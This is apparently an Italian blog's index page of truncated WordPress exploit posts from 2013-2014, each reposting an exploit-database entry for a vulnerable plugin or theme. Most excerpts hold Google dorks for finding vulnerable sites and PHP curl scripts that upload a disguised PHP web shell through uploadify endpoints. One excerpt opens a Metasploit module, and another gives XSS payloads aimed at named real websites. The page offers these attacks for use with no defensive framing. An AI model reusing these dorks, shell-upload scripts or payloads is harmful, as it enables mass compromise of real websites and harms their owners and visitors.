WordPress Business Intelligence 1.0.6 Shell Upload

31 marzo 2014 - Fonte: http://www.mondounix.com
##############################################################################################
# Exploit Title   : wordpress plugin "wp-business-intelligence" Remote code execution exploit
# Exploit Author  : Manish Kishan Tanwar
# vendor Home     : www.wpbusinessintelligence.com
# Version Affected: 1.0.6
# Discovered At   : IndiShell LAB (indishell.in aka indian cyber army)
# Love to         : zero cool,Team indishell,Hardeep Singh
##############################################################################################
 
 
////////////////////////////////////
POC Remote code Execution
////////////////////////////////////
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php...

Leggi il seguito »

WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress Felici / Custom Background Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
 
$uploadfile="cafc.php.jpg";
 
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress Barclaycart Shell Upload

10 marzo 2014 - Fonte: http://www.mondounix.com
                        WordPress Barclaycart Plugins Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/barclaycart"
#
#######################################################################################
 
Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",...

Leggi il seguito »

WordPress Premium Gallery Manager Shell Upload

8 marzo 2014 - Fonte: http://www.mondounix.com
          Wordpress Plugins Premium Gallery Manager Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager"
#
#######################################################################################
 
Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
...

Leggi il seguito »

WordPress thecotton Themes Remote File Upload Vulnerability

3 marzo 2014 - Fonte: http://www.mondounix.com
#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@ 
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@ 
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@ 
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@...

Leggi il seguito »

WordPress Kidoo Shell Upload

11 febbraio 2014 - Fonte: http://www.mondounix.com
<?php
*/
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Kidoo WP Theme File Upload Vulnerability
[+] Date: 05-02-2014
[+] Category: WebApp
[+] Google Dork: :(
[+] Tested on: KaliLinux
[+] Vendor: n/a
[+] Friendly Sites: na3il.com,th3-creative.com
 
Kiddo WP theme suffers from a File Upload Vulnerability
 
+PoC:
site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php
 
+Shell Path:
site/3vil.php
 
ScreenShot:
http://i.imgur.com/c62cWHH.png
 
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
E4A Members:
Gastro-DZ
 
*/
 
echo "=============================================== \n"; 
echo "   Kiddo WP Theme File Upload Vulnerability\n";...

Leggi il seguito »

WordPress Dandelion Theme Shell Upload

7 febbraio 2014 - Fonte: http://www.mondounix.com
# Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
# Google Dork: inurl:/wp-content/themes/dandelion/
# Date: 31/01/2014
# Exploit Author: TheBlackMonster (Marouane)
# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
# Software Link: Not Available
# Version: Web Application
# Tested on: Mozilla, Chrome, Opera -> Windows & Linux
‪#‎Greetz‬ : PhantomGhost, Deto Beiber, All Moroccan Hackers.
 
We are Moroccans, we are genuis !
 
<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch,...

Leggi il seguito »

WordPress Amerisale-Re Remote Shell Upload

31 gennaio 2014 - Fonte: http://www.mondounix.com
# Exploit Title : Wordpress amerisale-re Remote Shell Upload
# Exploit Author : T3rm!nat0r5
# Vendor Homepage : http://wordpress.org/
# Google Dork : inurl:/wp-content/plugins/amerisale-re
# Date : 2014/01/30
# Tested on : Windows 8 , Linux
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
 
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
  super(update_info(info,
            'Name'           => 'Wordpress amerisale-re Plugin Remote
Shell Upload',
       'Description' => %q{
        This module exploits an arbitrary...

Leggi il seguito »

WordPress WP-Checkout Cross Site Scripting / Shell Upload

5 novembre 2013 - Fonte: http://www.mondounix.com
#Title : Wordpress Plugin wp-checkout XSS / Arbitrary File Upload
 
#Author : DevilScreaM
 
#Date : 10/31/2013
 
#Category : Web Applications
 
#Type : PHP
 
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
     Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
 
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
 
#Vulnerabillity : xss, Arbitrary File Upload
 
#Dork : 
 
inurl:wp-content/plugins/wp-checkout
 
 
Cross Site Scripting
 
http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS]
 
Example
 
http://osteopathywinchester.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1>
http://pacificcrest.org/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1>
 
 
Solution
 
Upgrade...

Leggi il seguito »